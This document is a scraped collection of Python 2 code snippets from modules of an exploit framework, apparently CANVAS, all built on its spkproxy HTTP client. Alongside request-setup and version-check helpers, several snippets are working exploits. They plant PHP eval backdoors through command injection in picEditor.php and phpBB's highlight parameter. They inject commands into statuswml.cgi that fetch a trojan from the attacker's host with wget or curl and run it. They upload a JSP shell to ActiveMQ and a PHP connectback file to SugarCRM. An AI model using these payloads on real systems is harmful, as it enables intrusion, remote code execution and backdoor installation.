Ejemplo n.º 1
0
    def setup_UA(self, url):
        """
        Setup everything needed to do requests using spkproxy
        """
        if self.auth_user and self.auth_password:
            self.log("Using %s auth (User: %s - Password: %s)" %
                     (self.auth_type, self.auth_user, self.auth_password))
            if self.auth_type == "BASIC":
                auth = spkproxy.BasicAuth(self.auth_user, self.auth_password)
            else:  #NTLM
                domain = ""
                user = self.auth_user
                if "\\" in self.auth_user:
                    domain, user = self.auth_user.split("\\")
                    print "domain =", domain, " - user="******"X-Vermeer-Content-Type",
                     "application/x-vermeer-urlencoded")
        ua.addHeader("Content-Type", "application/x-vermeer-urlencoded")
        return ua
    def send_jboss_request(self, payload=None):
        if not self.hostname:
            self.hostname = self.host
            
        self.log("Attacking %s:%d" % (self.hostname, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)
        
        #setup our UA first
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
        else:
            auth = None
        
        targetstring = protocol + "://" + self.hostname + ":" + str(self.port) + self.basepath
        self.ua = spkproxy.UserAgent(targetstring, auth=auth, hostname=self.hostname, exploit=self)

        host_field = "%s:%s" % (self.hostname, self.port)
        
        self.ua.addHeader("Host", host_field)
 
        data = None
        if payload != None:
            data = self.ua.POST(self.targetpath, payload, extraheaders=None, noresponse=True)
        else:
            data = self.ua.GET(self.targetpath, noresponse=False)

        return data
Ejemplo n.º 3
0
    def send_initial_request(self):
        auth = None
        if self.basicauth:
            logging.debug('Using basic auth {}:{}'.format(
                self.basicauth_user, self.basicauth_password))
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)

        url = 'https' if self.https else 'http'
        url += '://' + self.host
        url += ':' + str(self.port)
        url += self.path
        url += '/CFIDE/wizards/common/utils.cfc'

        postdata = 'method=verifyldapserver&vusername=&vpassword=&vserver='
        postdata += self.ldap_ip
        postdata += '&vport='
        postdata += str(self.ldap_port)
        postdata += '&vstart=ou%3dmosdef%2cdc%3dexample%2cdc%3dorg'

        logging.info('Sending initial request')

        ua = spkproxy.UserAgent(url,
                                exploit=self,
                                auth=auth,
                                hostname=self.host)
        ua.addHeader("Content-Type", "application/x-www-form-urlencoded")
        ua.POST("", postdata, [], noresponse=False)

        logging.info('Sent')
Ejemplo n.º 4
0
    def send_struts_request(self, header, testing=False):
        protocol = "https" if self.ssl else "http"
        auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password) if self.basicauth_user else None

        host_name = self.host
        if self.vhost:
            host_name = self.vhost


        host_string = ("%s:%d" % (self.host, self.port)) if self.port != 80 else host_name
        target_string = "%s://%s" % (protocol, host_string)


        logging.info("connecting to: %s" % (target_string))

        self.ua = spkproxy.UserAgent(target_string, auth=auth, hostname=host_name, exploit=self)

        for (key, value) in header.iteritems():
            self.ua.addHeader(key, value)

        self.ua.addHeader("Host", host_string)
        self.ua.addHeader("Connection", "close")
        self.ua.addHeader("Accept-Encoding","identity")
        self.ua.addHeader("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36")

        kwargs = None
        (response, response_code) = (None, None)

        descriptor = self.ua.GET("/%s" % (self.basepath), noresponse=True)

        return descriptor
Ejemplo n.º 5
0
    def test_vuln(self, vhosts):
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        request = self.basepath + '?-s'
        ret = []

        for host in vhosts:
            try:
                data = spkproxy.urlopen(protocol + '://' + self.host +
                                        ":%s" % self.port + request,
                                        hostname=host,
                                        exploit=self,
                                        auth=auth).read()
                if data.lower().startswith("<code>"): ret.append(host)
            except Exception:
                import traceback
                self.log(traceback.format_exc(5))

        return ret
Ejemplo n.º 6
0
 def deploy_war(self):
   auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
   target = '%s/management/domain/applications/application' % self.url
   ua = spkproxy.UserAgent(target, auth=auth, exploit=self)
   ua.addHeader('Accept', 'application/json')
   ua.addHeader('X-Requested-By', 'dummy')
   data = "id=%s&force=true" % self.pathwar
   response = ua.POST("", data)
   return response
Ejemplo n.º 7
0
    def run(self):
        self.getargs()
        
        self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port))

        if self.version==0:
            ret=self.test()
            if not ret:
                self.log("Testing didn't find vulnerable target")
                return 0

        self.log("Attacking %s:%d"%(self.host,self.port))
        self.log("Basic Auth User: %s"%self.basicauth_user)
        self.log("VHost: %s"%self.hostname)
        if self.ssl:
            protocol="https"
        else:
            protocol="http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
        else:
            auth=None
            
        UA=spkproxy.UserAgent(protocol+"://"+self.host+"/"+self.basepath, auth=auth, hostname=self.hostname, exploit=self)
        
        if self.command:
            self.log("Command: %s"%self.command)
            command=self.command
            command="print(startz);passthru('"+command+"');print(endz);"              
            data = UA.POST("picEditor.php", "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;")
	    data = UA.GET("albums/edit/index.php?c=%s"%(urllib.quote_plus(command)))    
	    if "startz" in data:
                result=data.split("startz")[1].split("endz")[0]
                #self.log("Command data: %s"%prettyprint(data))
                self.log("Command result=%s"%prettyprint(result))
                ret=1
            else:
                self.log("Command not run - service patched?!")
        else:
            command=self.get_php_to_mosdef().strip()
            command=command.replace("/","`pwd|cut -b1`") 
            self.log("Command: %s"%command)
            self.log("Sending Exploit")
	    data = UA.POST("picEditor.php", "newimage=../../images/edit.gif&angle=10;cp%20anycontent.php%20albums/edit/index.php;sed%20-i%20s/php/@eval\(\$_GET[c]\)\;die\(\)\;/%20albums/edit/index.php;")
	    data = UA.GET("albums/edit/index.php?c=%s"%(urllib.quote_plus(command)))
	    self.log("Data=%s"%data)
            self.log("Looking for PHP connectback")
        ret=self.ISucceeded()
            
        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port))
        return ret
Ejemplo n.º 8
0
    def check(self):
        """
        Quicky banner check - looks for RomPager version.
        """
        self.getargs()
        self.log("Using basepath=%s" % self.basepath)
        self.log("Using vhost=%s" % self.hostname)
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        for hostname in self.allhosts:
            self.log("Testing hostname: %s" % hostname)

            self.log("Testing for RomPager version")
            #If we have to do basic-auth, let's get an object from spkproxy here
            if self.basicauth_user:
                auth = spkproxy.BasicAuth(self.basicauth_user,
                                          self.basicauth_password)
            else:
                auth = None

            #setting up spkproxy
            fd = spkproxy.urlopen(protocol + "://" + self.host +
                                  ":%s" % self.port + "/Allegro",
                                  hostname=hostname,
                                  exploit=self,
                                  auth=auth)
            data = fd.read()
            #now that we have the web page - we parse it and look for vulnerable versions
            #versions below 4.34 are assumed vulnerable.
            for s in ["RomPager Advanced Version 4.07"]:
                if s in data:
                    self.log_info(
                        "Detected vulnerable and supported RomPager version on %s "
                        % (hostname))
                    #self.argsDict["basepath"]=basepath
                    #self.basepath=basepath
                    self.hostname = hostname
                    self.version = 1
                    #self.log_debug("Response:%s"%data)
                    return 1
                else:
                    for s in ["RomPager"]:
                        if s in data:
                            self.log_info(
                                "Unsupported version of RomPager was detected."
                            )
                            self.log_debug("Response: %s" % data)
                            return 0
                        else:
                            self.log_info("Target is not running RomPager.")
                            #self.log_debug("Response: %s"%data)
                            return 0
        return 0
Ejemplo n.º 9
0
    def get_jenkins_info(self):
        if not self.hostname:
            self.hostname = self.host

        self.log("Attacking %s:%d" % (self.hostname, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)

        #setup our UA first
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        targetstring = protocol + "://" + self.hostname + ":" + str(
            self.port) + self.basepath

        host_field = "%s:%s" % (self.hostname, self.port)

        self.ua = spkproxy.UserAgent(targetstring,
                                     auth=auth,
                                     hostname=self.hostname,
                                     exploit=self)

        self.ua.addHeader("Host", host_field)

        (response, response_code) = self.ua.GET(self.targetpath,
                                                noresponse=False,
                                                entireresponse=True,
                                                return_response_code=True)

        version = self.extract_regex_result(response, self.version_re,
                                            "version")
        if self.version_test(version):
            return_value = None
            if 299 < response_code or response_code < 200:
                pass
            else:
                for line in response.split("\r\n"):
                    if "X-Jenkins-CLI-Port" in line:
                        field = line.split(":")
                        return_value = int(field[1])
                        break

            return return_value
        else:
            return None
Ejemplo n.º 10
0
    def run(self):
        self.getargs()
        
        self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.host,self.port))

        if self.version==0:
            ret=self.test()
            if not ret:
                self.log("Testing didn't find vulnerable target")
                return 0

        self.log("Attacking %s:%d"%(self.host,self.port))
        self.log("Basic Auth User: %s"%self.basicauth_user)
        self.log("VHost: %s"%self.hostname)
        if self.ssl:
            protocol="https"
        else:
            protocol="http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
        else:
            auth=None
            
        UA=spkproxy.UserAgent(protocol+"://"+self.host+":%s"%self.port+"/"+self.basepath, auth=auth, hostname=self.hostname, exploit=self)
                                           
        if self.command:
            self.log("Command: %s"%self.command)
            command=self.command
            command="print '---1243---\n';passthru(\'"+command+"');print '---3421---\n'; ".strip()
            data = UA.GET("viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527"%(urllib.quote_plus(command)))
            if "---1243---" in data:
                result=data.split("1243---")[1].split("---3421")[0]
                self.log("Command data: %s"%prettyprint(data))
                self.log("Command result=%s"%prettyprint(result))
                ret=1
            else:
                self.log("Command not run - service patched?!")
        else:
            command=self.get_php_to_mosdef().strip()
            command=command.replace("/","`pwd|cut -b1`") 
            self.log("Command: %s"%command)
            data = UA.GET("viewtopic.php?c=%s&t=1&highlight=%%2527.eval($_GET[c]).%%2527"%(urllib.quote_plus(command)))
            self.log("Looking for PHP connectback")
            ret=self.ISucceeded()
            
        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port))
        return ret
Ejemplo n.º 11
0
    def setup_UA(self, url=""):
        """
        Setup everything needed to do requests using spkproxy
        """
        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.username and self.password:
            auth = spkproxy.BasicAuth(self.username, self.password)
            self.log("Using BasicAuth (User: %s - Password: %s)" % (self.username, self.password))
        else:
            auth = None

        ua  = spkproxy.UserAgent(url, auth=auth, hostname=self.host, exploit=self)
        return ua
Ejemplo n.º 12
0
    def test(self):
        """
        Quicky banner check - looks for comon basepaths
        """
        self.getargs()
        self.log("Using basepath=%s" % self.basepath)
        self.log("Using vhost=%s" % self.hostname)
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        for hostname in self.allhosts:
            self.log("Testing hostname: %s" % hostname)

            #automatically check out some common basepaths, starting with the one specified
            for basepath in [
                    self.basepath, "/punn/upload/", "/punbb/", "/PunBB/",
                    "/board/", "/forum/", "/upload/", "/"
            ]:
                self.log("Testing for basepath: %s" % basepath)

                #If we have to do basic-auth, let's get an object from spkproxy here
                if self.basicauth_user:
                    auth = spkproxy.BasicAuth(self.basicauth_user,
                                              self.basicauth_password)
                else:
                    auth = None

                #this is the main call that does the magic here...
                fd = spkproxy.urlopen(protocol + "://" + self.host +
                                      ':%s' % self.port + "/" + basepath,
                                      hostname=hostname,
                                      exploit=self,
                                      auth=auth)
                data = fd.read()

                #now that we have the web page - we parse it and look for vulnerable versions
                #list of vulnerable versions so far
                for s in ["PunBB"]:
                    #self.log("Data=%s"%data) #print out web page (big)
                    if s in data:
                        self.log(
                            "Found Potential vulnerable PunBB in vhost %s at basepath %s"
                            % (hostname, basepath))
                        self.argsDict["basepath"] = basepath
                        self.basepath = basepath
                        self.hostname = hostname
                        self.version = 1
                        return 1
        return 0
Ejemplo n.º 13
0
    def setup_UA(self):
        """
        Setup everything needed to do requests using spkproxy
        """
        if self.basicauth_user and self.basicauth_password:
            auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
            logging.info("Using BasicAuth (User: %s - Password: %s)" % (self.basicauth_user, self.basicauth_password))
        else:
            auth = None

        ua = spkproxy.UserAgent(self.base_url, auth=auth, hostname=self.hostname, exploit=self)

        #ua = spkproxy.UserAgent(self.base_url, auth=auth, hostname=self.hostname, exploit=self, proxyhost="localhost", proxyport=8080)
        return ua
Ejemplo n.º 14
0
    def run(self):
        self.getargs()
        self.setInfo("%s attacking %s:%d (in progress)"%(NAME,self.hostname,self.port))
        
        self.log("Attacking %s:%d"%(self.hostname,self.port))
        self.log("Basic Auth User: %s"%self.basicauth_user)
        self.log("VHost: %s"%self.hostname)
        if self.ssl:
            protocol="https"
        else:
            protocol="http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user !="":
            auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
        else:
            auth=None
        
        useragentstring=protocol+"://"+self.host+":%s"%self.port+"/"+self.basepath    
        self.log("useragentstring: %s"%useragentstring)

        UA=spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self)
        
        t = threading.Thread(target=self.set_up_webserver)
        t.setDaemon(True)
        t.start()

        response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;wget%%20-O%%20/tmp/%s%%20http://%s:%s/index.html"""%(self.trojanname, self.callback.ip, self.webserverport), noresponse=False)
        response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;chmod%%20777%%20/tmp/%s;/tmp/%s"""%(self.trojanname, self.trojanname), noresponse=True)
        
        time.sleep(5)

        if self.ISucceeded():
            self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
            return 1
        else:
            print "wget attempt failed - retrying with curl"
            response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;curl%%20-o%%20/tmp/%s%%20http://%s:%s/index.html"""%(self.trojanname, self.callback.ip, self.webserverport), noresponse=False)
            response = UA.GET("""/cgi-bin/statuswml.cgi?ping=127.0.0.1;chmod%%20777%%20/tmp/%s;/tmp/%s"""%(self.trojanname, self.trojanname), noresponse=True)
            time.sleep(5)
            if self.ISucceeded():
                self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
                return 1
            else:
                self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port))
                return 0
Ejemplo n.º 15
0
    def setup_UA(self, url):
        """
        Setup everything needed to do requests using spkproxy
        """
        if self.basicauth_user and self.basicauth_password:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
            self.log("Using BasicAuth (User: %s - Password: %s)" %
                     (self.basicauth_user, self.basicauth_password))
        else:
            auth = None

        ua = spkproxy.UserAgent(url,
                                auth=auth,
                                hostname=self.hostname,
                                exploit=self)
        return ua
Ejemplo n.º 16
0
    def test(self):
        """
        Quicky banner check - looks for comon basepaths
        """
        self.getargs()
        self.log("Using basepath=%s"%self.basepath)
        self.log("Using vhost=%s"%self.hostname)
        self.log("Using Testfile=%s"%self.testfile)

        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        for hostname in self.allhosts:
            self.log("Testing hostname: %s"%hostname)

            #automatically check out some common basepaths, starting with the one specified
            for basepath in self.basepaths:
                self.log("Testing for basepath: %s"%basepath)

                #If we have to do basic-auth, let's get an object from spkproxy here
                if self.basicauth_user:
                    auth = spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
                else:
                    auth = None 

                #this is the main call that does the magic here...
                fd = spkproxy.urlopen(protocol+"://"+self.host+':%s'%self.port+basepath+self.testfile, hostname=hostname, exploit=self, auth=auth, extraheaders=[("User-Agent","Mozilla/4.0 (compatible; MSIE 5.0; Windows NT;)")])
                data = fd.read()

                #now that we have the web page - we parse it and look for vulnerable versions
                #list of vulnerable versions so far
                for s in self.foundstrings:
                    devlog("phpexploit","Data=%s"%data) #print out web page (big)
                    if s in data:
                        self.log("Found Potential vulnerable php app in vhost %s at basepath %s"%(hostname, basepath))
                        self.argsDict["basepath"] = basepath
                        self.basepath = basepath
                        self.hostname = hostname
                        self.version = 1
                        return 1
        return 0
Ejemplo n.º 17
0
    def setup_UA(self):

        self.getargs()
        
        if self.ssl:
            protocol="https"
        else:
            protocol="http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user !="":
            auth=spkproxy.BasicAuth(self.basicauth_user,self.basicauth_password)
        else:
            auth=None

        useragentstring=protocol+"://"+self.host+":%s"%self.port+"/"
        self.log("useragentstring: %s"%useragentstring)

        self.UA=spkproxy.UserAgent(useragentstring, auth=auth, hostname=self.hostname, exploit=self)
Ejemplo n.º 18
0
    def test(self):
        self.getargs()

        if not self.hostname:
            self.hostname = self.host

        self.log("Attacking %s:%d" % (self.hostname, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)

        #setup our UA first
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        targetstring = protocol + "://" + self.hostname + ":" + str(
            self.port) + self.basepath

        host_field = "%s:%s" % (self.hostname, self.port)

        self.ua = spkproxy.UserAgent(targetstring,
                                     auth=auth,
                                     hostname=self.hostname,
                                     exploit=self)

        self.ua.addHeader("Host", host_field)

        (response, response_code) = self.ua.GET(self.targetpath,
                                                noresponse=False,
                                                entireresponse=True,
                                                return_response_code=True)

        version = self.extract_regex_result(response, self.version_re,
                                            "version")

        return self.version_test(version)
Ejemplo n.º 19
0
    def send_request(self, data, no_response=True):
        auth = None

        req_header = spkproxy.header()

        req_header.connectHost = self.target.interface
        req_header.connectPort = self.port

        req_header.URL = "/"
        req_header.verb = "PROPFIND"
        req_header.addHeader("Content-Length", "0")
        req_header.addHeader("Host", self.host)
        req_header.addHeader("If", data)
        req_header.setSurpressContentLength()

        req_body = spkproxy.body()

        ntlm_info = ["","",""] #NTLM user / password / domain
        proxy_info = ["", 0, "", 0]

        if self.auth_type == "basic":
            auth = spkproxy.BasicAuth(self.auth_user, self.auth_password)
            auth.getHeader(req_header)
        elif self.auth_type == "ntlm":
            ntlm_info = [self.auth_user, self.auth_password, self.auth_domain]

        if self.proxy_port is not None:
            proxy_info = [self.proxy_host, self.proxy_port, self.proxy_host, self.proxy_port]

        con = spkproxy.spkProxyConnection(None, None, proxy=proxy_info, ntlm=ntlm_info)

        con.gettcpsock = self.gettcpsock

        if self.ssl:
            con.clientisSSL = 1

        if no_response:
            con.sendRequest(req_header, req_body, noresponse=no_response)
        else:
            x = con.sendRequest(req_header, req_body, noresponse=no_response)
            return x
Ejemplo n.º 20
0
    def test(self):
        self.getargs()
        auth = None

        req_header = spkproxy.header()

        req_header.connectHost = self.target.interface
        req_header.connectPort = self.port

        req_header.URL = "/"
        req_header.verb = "OPTIONS"
        req_header.addHeader("Host", self.host)

        req_body = spkproxy.body()

        ntlm_info = ["","",""] #NTLM user / password / domain
        proxy_info = ["", 0, "", 0]

        if self.auth_type == "basic":
            auth = spkproxy.BasicAuth(self.auth_user, self.auth_password)
            auth.getHeader(req_header)
        elif self.auth_type == "ntlm":
            ntlm_info = [self.auth_user, self.auth_password, self.auth_domain]

        if self.proxy_port is not None:
            proxy_info = [self.proxy_host, self.proxy_port, self.proxy_host, self.proxy_port]

        con = spkproxy.spkProxyConnection(None, None, proxy=proxy_info, ntlm=ntlm_info)

        con.gettcpsock = self.gettcpsock

        if self.ssl:
            con.clientisSSL = 1

        logging.info("sending header request")
        response = con.sendRequest(req_header, req_body, noresponse=False)

        if isinstance(response, str):
            return int("Server: Microsoft-IIS/6.0" in response and "MS-Author-Via: DAV" in response)
        else:
            return 0
Ejemplo n.º 21
0
    def run(self):
        self.getargs()

        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.host, self.port))

        self.log("Attacking %s:%d" % (self.host, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

#port=self.port
#If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        #UA=spkproxy.UserAgent(protocol+"://"+self.host+":8088/"+self.basepath, auth=auth, hostname=self.hostname, exploit=self)

        UA = spkproxy.UserAgent(protocol + "://" + self.host +
                                ":%s" % self.port + "/" + self.basepath,
                                auth=auth,
                                hostname=self.hostname,
                                exploit=self)

        data = UA.GET("%s%s%%00.txt" % (self.basepath, self.command))
        self.log("Source=%s" % data)
        #ret=self.ISucceeded()
        #
        #if ret:
        #    self.setInfo("%s attacking %s:%d - done (success!)"%(NAME,self.host,self.port))
        #else:
        #    self.setInfo("%s attacking %s:%d - done (failed)"%(NAME,self.host,self.port))
        #return ret
        self.log("Check CANVAS log in next tab for page source")
Ejemplo n.º 22
0
    def setup_UA(self, url="", add_trail_slash=False):
        """
        Setup everything needed to do requests using spkproxy
        """
        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user and self.basicauth_password:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
            self.log("Using BasicAuth (User: %s - Password: %s)" %
                     (self.basicauth_user, self.basicauth_password))
        else:
            auth = None

        self.log("HtmlAdaptor servlet url: %s" % self.htmladaptor_url)
        if not url:
            url = self.htmladaptor_url + "/" if add_trail_slash else self.htmladaptor_url
        self.log("Setting spkproxy.UserAgent with url: %s" % url)
        ua = spkproxy.UserAgent(url,
                                auth=auth,
                                hostname=self.hostname,
                                exploit=self)
        return ua
Ejemplo n.º 23
0
    def send_activemq_request(self):
        if not self.hostname:
            self.hostname = self.host

        self.log('[D2] Attacking %s:%d' % (self.hostname, self.port))
        self.log('[D2] Basic Auth User: %s' % self.basicauth_user)
        self.log('[D2] VHost: %s' % self.hostname)

        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        # directory traversal
        self.log('[D2] Exploit Directory Traversal Vulnerability')
        auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_pass)
        host_field = "%s:%s" % (self.hostname, self.port)

        targetstring = protocol + "://" + self.hostname + ":" + str(
            self.port) + self.basepath
        self.ua = spkproxy.UserAgent(targetstring,
                                     auth=auth,
                                     hostname=self.hostname,
                                     exploit=self)
        self.ua.addHeader("Host", host_field)

        data = open(self.filejsp, 'r').read()
        self.ua.PUT('', data, noresponse=True)

        # request mosdef jsp script
        self.log('[D2] Request uploaded mosdef JSP script')
        targetstring = protocol + "://" + self.hostname + ":" + str(
            self.port) + '/admin/d2.jsp'
        self.ua = spkproxy.UserAgent(targetstring,
                                     auth=auth,
                                     hostname=self.hostname,
                                     exploit=self)
        self.ua.addHeader("Host", host_field)
        data = self.ua.GET('')
    def test(self):
        self.getargs()

        if not self.hostname:
            self.hostname = self.host

        self.log("Checking %s:%d" % (self.hostname, self.port))
        self.log("Basic Auth User: %s" % self.basicauth_user)
        self.log("VHost: %s" % self.hostname)

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user:
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        targetstring = "https://" + self.hostname + ":" + str(
            self.port) + "/vco/api/about"
        self.ua = spkproxy.UserAgent(targetstring,
                                     auth=auth,
                                     hostname=self.hostname,
                                     exploit=self)

        host_field = "%s:%s" % (self.hostname, self.port)

        self.ua.addHeader("host", host_field)

        data = None
        data = self.ua.GET(self.targetpath, noresponse=False)

        self.log("got response:%s from /vco/api/about" % data)

        data = json.loads(data)

        version_string = self.extract_regex_result(data["version"],
                                                   self.version_re, "version")

        return int(version_string <= "6.0.1.2490144")
Ejemplo n.º 25
0
    def is_vulnerable(self):
        status = False

        if self.basicauth_user:
            self.auth = spkproxy.BasicAuth(self.basicauth_user, self.basicauth_password)
        else:
            self.auth = None

        if self.cookies:
            self.extraheaders = [("Cookie", self.cookies)]

        #Test GET request
        tag     = "RENDER-TEST-INJECTION"
        param_name = self.param + "[inline]"
        params = { param_name : tag }
        if self.moreparams:
            params = self.add_params(params, self.moreparams)
        urlencoded_params =  urllib.urlencode(params)
        request = self.basepath + "?" + urlencoded_params
        target = self.host
        if self.vhost:
            target = self.vhost
        url = self.protocol + '://' + target + ":%s" % self.port + request

        (res, responsecode) = spkproxy.urlopen(url, extraheaders=self.extraheaders, data="", exploit=self, entireresponse=True, return_response_code=True, auth=self.auth,verb="GET")
        response = res.read()

        if responsecode == 200 :
            if tag in response:
                status = True
                self.vulnerable_target = target
        if responsecode == 401 :
            if "WWW-Authenticate: Basic realm" in response:
                raise ValueError("Authentication Failed - Basic Realm detected: check username & password and try it again")
            else:
                raise ValueError("Authentication Failed - Not Basic Realm")

        return status
Ejemplo n.º 26
0
    def do_url_connect(self, host_info, proxy=None):
        """ do basic http auth if needed .. connect to url """

        # ssl flag toggles to https
        if host_info['ssl']:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if host_info['user']:
            auth = spkproxy.BasicAuth(host_info['user'], host_info['password'])
        else:
            auth = None

        if not proxy:
            UA = spkproxy.UserAgent(protocol+"://"+host_info['host']+':%s'% host_info['port']+"/"+host_info['basepath'], \
                 auth=auth, hostname=host_info['hostname'], exploit=self)
        else:
            self.log("Using web proxy: %s" % proxy)
            UA = spkproxy.UserAgent(protocol+"://"+host_info['host']+':%s'% host_info['port']+"/"+host_info['basepath'], \
                 auth=auth, hostname=host_info['hostname'], exploit=self, \
                 proxyhost=proxy.split(':')[0], proxyport=int(proxy.split(':')[1]))
        return UA
Ejemplo n.º 27
0
    def run(self):
        self.getargs()
        test = self.test()
        self.setInfo("%s attacking %s:%d (in progress)" %
                     (NAME, self.hostname, self.port))

        self.log("Attacking %s:%d" % (self.hostname, self.port))
        #self.log("Basic Auth User: %s"%self.basicauth_user)
        self.log("VHost: %s" % self.hostname)
        if self.ssl:
            protocol = "https"
        else:
            protocol = "http"

        #If we have to do basic-auth, let's get an object from spkproxy here
        if self.basicauth_user != "":
            auth = spkproxy.BasicAuth(self.basicauth_user,
                                      self.basicauth_password)
        else:
            auth = None

        useragentstring = protocol + "://" + self.host + ":%s" % self.port + "/" + self.basepath
        self.log("useragentstring: %s" % useragentstring)

        UA = spkproxy.UserAgent(useragentstring,
                                auth=auth,
                                hostname=self.hostname,
                                exploit=self)

        response = UA.POST(
            self.loginpage,
            "module=Users&action=Authenticate&return_module=Users&return_action=Login&cant_login=&login_module=&login_action=&login_record=&user_name=%s&user_password=%s&login_theme=Sugar&login_language=en_us&Login=++Login++"
            % (self.username, self.password),
            noresponse=False)
        #self.log("AFTER LOGIN %s"%response)

        #if the user has not assigned a valid timezone in which they reside then we can't continue to get a userid
        #if "action=SetTimezone" in response:
        #self.log("setting time zone for %s"%self.username)
        response = UA.POST(
            self.timezonepage,
            "record=&module=Users&action=SaveTimezone&SaveTimezone=true&timezone=America%2FNew_York&button=++Save++"
        )
        #self.log(response)

        #find out what are assigned userid is
        #<a href="index.php?module=Emails&action=ListView&assigned_user_id=abf7c77b-2f71-8071-63ba-4a131068e9a2&type=archived">
        #not very pretty - but it works!
        response = UA.GET(self.composemailpage)
        #self.log(response)

        try:
            userid = response.split("assigned_user_id=")[1].split("&")[0]
            self.log("Assigned User-Id: %s" % userid)
        except:
            self.log(
                "Couldn't determine our assigned_user_id - make sure we are connecting to the correct SugarCRM host!"
            )
            return 0

        #push our file up
        UA.addHeader(
            "Content-Type",
            "multipart/form-data; boundary=---------------------------3922242971797626524322043819"
        )
        response = UA.POST(self.composemailpage, self.getfile())
        #self.log(response)
        #{"guid":"c7e4746b-bba6-6dfd-7a2b-4a3977a03f0d","name":".php","nameForDisplay":".php"}

        try:
            prefix = response.split(",")[0].split(":")[1].strip("\"")
            ourphpfilename = prefix + ".php"
            self.log("our remote filename: %s" % ourphpfilename)
        except:
            self.log(
                "Couldn't determine our remote filename - make sure we are connecting to the correct SugarCRM host!"
            )
            return 0

        ourfile = self.pathtoourfile + "//" + userid + "//" + ourphpfilename
        self.log("Path to our file: %s" % ourfile)
        #execute our file!
        UA.clearHeaders()
        response = UA.GET(ourfile, noresponse=True)

        for i in xrange(0, 3):  #wait three seconds for callback
            time.sleep(1)
            ret = self.ISucceeded()
            if ret:
                break

        if ret:
            self.setInfo("%s attacking %s:%d - done (success!)" %
                         (NAME, self.host, self.port))
        else:
            self.setInfo("%s attacking %s:%d - done (failed)" %
                         (NAME, self.host, self.port))
        return ret
Ejemplo n.º 28
0
    def run(self):
        for node in self.argsDict['passednodes']:
            self.getargs()
            self.setInfo("%s attacking %s:%d (in progress)" %
                         (NAME, self.host, self.port))
            self.log_info("Using version: %s" % self.version)
            ret = self.check()
            self.setProgress(30)
            if not ret:
                self.setInfo(
                    "%s against %s:%d (failed: didn't find vulnerable target!)"
                    % (NAME, self.host, self.port))
                self.log_info("Testing didn't find vulnerable target")
                return 0

